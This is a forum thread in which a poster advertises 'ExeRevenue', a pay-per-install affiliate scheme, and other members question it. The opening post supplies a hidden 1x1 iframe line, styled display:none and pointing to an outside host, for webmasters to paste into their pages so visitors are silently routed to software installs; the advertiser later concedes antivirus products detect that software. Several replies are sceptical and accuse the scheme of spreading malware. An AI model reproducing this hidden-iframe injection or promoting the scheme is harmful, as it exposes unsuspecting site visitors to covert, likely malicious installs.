Default ExeRevenue - WWW traffic now accepted !

Hello,

ExeRevenue now accepts WWW traffic again. It is very easy. You put a single line in your HTML sources and start earning cash. The line is as follows:

Code:
    <iframe src="http&#58;//put.ghura.pl/CHANGE_HERE/" width=1 height=1 style="display&#58;none"></iframe>
    where CHANGE_HERE should be replaced with your affiliate ID (it is a number, not a word; you can get it from EXE link in our panel, where it looks like ?i=123&t=... - take this 123).

Average conversion is about 12% (that is, if you have only 1000 uniq daily, you get paid for 120 installs daily - depending on your traffic it can be from 55$ up to even 475$ monthly salary).

We kindly encourage all webmasters to start working with us. We offer weekly payment with no hold.

I asked you a few question on the other thread. But it was closed. So i am aksing those here:

Pay per installs have viruses and not my favorite. And also people just don't want to install software which they just see online. Laughing

Well you have not mentioned which payment processors you are using to pay the members. And also do you accept installs from all countries? And do you have a different rate for each country?

How reliable are your softwares? Are they guranteed free of malicious softwares?
    Hope will get reply here.

alec11 is offline Veteran Member I was here more times.

If you're persistent to get answer from him, just go to his site, then go to contact support page.
    You can contact him there

Quote Originally Posted by alec11
    If you're persistent to get answer from him, just go to his site, then go to contact support page.
    You can contact him there
    I am not interested in PPI sites. Because they are not reliable. That's why i asked here so others also can know about the site more. :0

i didn't understand much in this, i just put a URL in the HTML and earn how is that possible and how much we might earn for a single click, or how does it work? is it really helpful in earning

alec11 is offline Veteran Member I was here more times.

Quote Originally Posted by ashvini
    i didn't understand much in this, i just put a URL in the HTML and earn how is that possible and how much we might earn for a single click, or how does it work? is it really helpful in earning
    It mean, you should use frame to your website and the frame linked to his site.
    And if someone go to his site and install something, you will get paid.

I just want to know wha is the minimum payout there? Bez here u says that from 55$ up to even 475$ monthly salary - is it really working?? Pls share with us some payment proof also..

anyone here already joining this affiliate program?
    and anyone already got paid from this site?
    please report here.

I think the person only wanted to advertise the site here and nothing else. That's why he did not answer to anyone.

Quote Originally Posted by darksorrow
    Well you have not mentioned which payment processors you are using to pay the members. And also do you accept installs from all countries? And do you have a different rate for each country?

How reliable are your softwares? Are they guranteed free of malicious softwares?
    Webmoney, ePassporte/PayPal exchanges on request, Wire for 100+
    Installs from all countries are accepted
    There are different rates which you'd see instantly if you entered our site - but you didn't, because you only want money from your posting, did I guess right

Of course our program is not malicious, dangerous, or destructive. The only minor is that some antivirus companies detect it.

Regards.

Quote Originally Posted by Alberich
    Webmoney, ePassporte/PayPal exchanges on request, Wire for 100+
    Installs from all countries are accepted
    There are different rates which you'd see instantly if you entered our site - but you didn't, because you only want money from your posting, did I guess right

Of course our program is not malicious, dangerous, or destructive. The only minor is that some antivirus companies detect it.

Regards.
    Hmmm. I want money from my posting and that's why i am asking you the questions. And my questions are worth it i think

And thanks for being honest and telling that you have malicious activities on your site.